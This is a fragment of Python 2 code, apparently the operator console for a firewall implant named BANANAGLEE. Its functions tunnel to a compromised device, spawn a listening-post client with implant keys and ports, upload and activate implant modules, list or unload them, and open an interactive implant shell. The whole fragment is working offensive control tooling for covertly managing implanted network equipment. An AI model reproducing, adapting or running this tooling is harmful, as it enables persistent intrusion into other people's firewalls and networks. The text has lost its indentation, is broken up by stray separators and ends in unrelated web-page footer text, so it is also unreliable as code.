child.sendline(((('33 ' + str(command_id)) + ' 34 ') + str(command_id)))
child.expect('BG#', timeout=180)
child.sendline('36')
child.expect('BG#', timeout=120)
child.sendline('9')
child.expect('BG#', timeout=120)
child.sendline('0')
except:
self.logger.exception((('unload ' + str(module)) + ' failed'))
tools.closeTunnel(self.sfile, tunnel_number, self.logger)
logfile.close()
n = 0
tmp_list = self.sfile['uploaded_mod_list']
for i in tmp_list:
if (i == module):
tmp_list.pop(n)
else:
n += 1
self.sfile['uploaded_mod_list'] = tmp_list
|
'show_uploaded_modules [connect]
returns the modules that are currently uploaded
if connect is used a connection to the firewall will be made'
| def do_show_uploaded_modules(self, line):
| if (line == ''):
self.logger.info('modules that are currently loaded')
for mod in self.sfile['uploaded_mod_list']:
self.logger.info(str(mod))
elif (line[0].lower() == 'c'):
tunnel_number = tools.openTunnel(self.sfile, self.logger)
command = ((((((((((((str(self.sfile['lp_bin']) + ' --lp ') + str(self.sfile['lp'])) + ' --implant ') + str(self.sfile['implant'])) + ' --idkey ') + str(self.sfile['idkey'])) + ' --sport ') + str(self.sfile['sport'])) + ' --dport ') + str(self.sfile['dport'])) + ' --logdir ') + self.sfile['logs_to_process'])
child = pexpect.spawn(command)
temp_counter = 0
found_file = False
while (found_file == False):
if (os.path.isfile(os.path.join(self.sfile['log_dir'], (((((self.sfile['hostname'] + '.') + self.sfile['target']) + 'BG_shell') + str(temp_counter)) + '.log'))) == True):
temp_counter += 1
else:
log_file = os.path.join(self.sfile['log_dir'], (((((self.sfile['hostname'] + '.') + self.sfile['target']) + 'BG_shell') + str(temp_counter)) + '.log'))
found_file = True
logfile = file(log_file, 'a')
child.logfile = logfile
try:
child.sendline('1')
child.expect('BG#', timeout=120)
child.sendline('36')
child.expect('BG#', timeout=180)
child.sendline('9')
child.expect('BG#', timeout=120)
child.sendline('0')
except:
self.logger.exception('Could not list out uploaded modules')
self.logger.info('uploaded modules')
for i in child.before.split('\r\n'):
self.logger.info(i)
tools.closeTunnel(self.sfile, tunnel_number, self.logger)
|
'shell
drops user to a BANANAGLEE shell'
| def do_shell(self, module):
| self.logger.debug('user ran shell')
tunnel_number = tools.openTunnel(self.sfile, self.logger)
command = ((((((((((((str(self.sfile['lp_bin']) + ' --lp ') + str(self.sfile['lp'])) + ' --implant ') + str(self.sfile['implant'])) + ' --idkey ') + str(self.sfile['idkey'])) + ' --sport ') + str(self.sfile['sport'])) + ' --dport ') + str(self.sfile['dport'])) + ' --logdir ') + self.sfile['logs_to_process'])
child = pexpect.spawn(command)
temp_counter = 0
found_file = False
while (found_file == False):
if (os.path.isfile(os.path.join(self.sfile['log_dir'], (((((self.sfile['hostname'] + '.') + self.sfile['target']) + 'BG_shell') + str(temp_counter)) + '.log'))) == True):
temp_counter += 1
else:
log_file = os.path.join(self.sfile['log_dir'], (((((self.sfile['hostname'] + '.') + self.sfile['target']) + 'BG_shell') + str(temp_counter)) + '.log'))
found_file = True
logfile = file(log_file, 'a')
child.logfile = logfile
try:
child.interact()
except:
self.logger.debug('user left shell')
tools.closeTunnel(self.sfile, tunnel_number, self.logger)
logfile.close()
return
|
'load [module]
uploads and activates a module'
| def do_load(self, module):
| self.logger.debug(('user ran load ' + str(module)))
if (module in self.sfile['mod_num_dict']):
module_number = self.sfile['mod_num_dict'][module]
else:
self.logger.error('selected an invalid module, the valid modules are:')
self.do_show_uploadable_modules(' ')
if (module in self.sfile['uploaded_mod_list']):
self.logger.info((('the module ' + str(module)) + ' is already uploaded'))
return
if (self.sfile['survey'] == False):
self.logger.error('survey had not been completed, please run survey')
return
tunnel_number = tools.openTunnel(self.sfile, self.logger)
command = ((((((((((((str(self.sfile['lp_bin']) + ' --lp ') + str(self.sfile['lp'])) + ' --implant ') + str(self.sfile['implant'])) + ' --idkey ') + str(self.sfile['idkey'])) + ' --sport ') + str(self.sfile['sport'])) + ' --dport ') + str(self.sfile['dport'])) + ' --logdir ') + self.sfile['logs_to_process'])
child = pexpect.spawn(command)
temp_counter = 0
found_file = False
while (found_file == False):
if (os.path.isfile(os.path.join(self.sfile['log_dir'], (((((self.sfile['hostname'] + '.') + self.sfile['target']) + 'BG_upload_module') + str(temp_counter)) + '.log'))) == True):
temp_counter += 1
else:
log_file = os.path.join(self.sfile['log_dir'], (((((self.sfile['hostname'] + '.') + self.sfile['target']) + 'BG_upload_module') + str(temp_counter)) + '.log'))
found_file = True
logfile = file(log_file, 'a')
child.logfile = logfile
try:
child.sendline('1')
child.expect('BG#', timeout=120)
child.sendline('31')
child.expect('# Select module', timeout=120)
child.sendline(str(module_number))
self.logger.debug(((('uploading ' + str(module)) + ' with ID of: ') + str(module_number)))
child.expect('BG#', timeout=300)
id_num = self.tools_config.get(('bananaglee' + self.sfile['version']), (str(module) + '_ID'))
child.sendline(('32 ' + str(id_num)))
self.logger.debug(('activating the module with 32 ' + str(id_num)))
child.expect('BG#', timeout=120)
child.sendline('36')
child.expect('BG#', timeout=120)
child.sendline('9')
child.expect('BG#', timeout=120)
child.sendline('0')
logfile.close()
except:
self.logger.exception(('could not load the module : ' + str(module)))
tools.closeTunnel(self.sfile, tunnel_number, self.logger)
with open(log_file, 'r') as f:
output = f.readlines()
insert_dict = {}
for i in output:
if ('Command' in i):
self.logger.info(i.rstrip('\r\n'))
command_id = i[(-6):].rstrip('\r\n')
command = i.split("'")[1]
insert_dict[command] = str(command_id)
self.sfile[module] = insert_dict
self.uploaded_mod_list.append(module)
self.sfile['uploaded_mod_list'] = self.uploaded_mod_list
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.